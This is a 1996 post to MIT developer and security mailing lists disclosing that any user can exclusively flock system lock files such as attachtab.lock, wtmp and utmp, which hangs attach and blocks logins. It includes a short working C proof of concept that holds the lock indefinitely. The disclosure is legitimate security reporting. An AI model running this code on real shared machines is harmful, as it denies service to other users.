[1402] in NetBSD-Development
[security] file locking denial of service attack
daemon@ATHENA.MIT.EDU (Erik Nygren)
Thu Nov 28 14:48:38 1996
To: linux-dev@MIT.EDU, netbsd-dev@MIT.EDU, pc-dialup@MIT.EDU, security@MIT.EDU
Date: Thu, 28 Nov 1996 14:48:13 EST
From: Erik Nygren <nygren@MIT.EDU>
[Wasn't sure of the best place to send this.]
You don't need write privledges to exclusively lock a file with flock.
As a result, locking key system files that other programs like to lock
(such as attachtab.lock, wtmp, utmp, and others) can create a denial
of service attack. The login shipped with linux-athena is vulnerable
(although it may not need to lock wtmp in the way it does). Attach on
Linux and NetBSD can be forced to hang (which essentially prohibits
logins of Athena users) if /var/tmp/attachtab.lock is set. This may
be more of a problem on dialups than on cluster or private machines.
For example, when the following program is run, all attaches will hang
for all users:
#include <stdio.h>
#include <sys/file.h>
#include <unistd.h>
void main(int argc, char **argv)
{
int fd;
fd = open("/var/tmp/attachtab.lock", O_RDONLY);
flock(fd, LOCK_EX);
while (1) sleep(20);
}
This may be a previously known problem. I'm not sure
what the best way of fixing it is, either. Regardless,
I'm sure there are a number of other critical programs you could
hose using this. Blah.
Erik
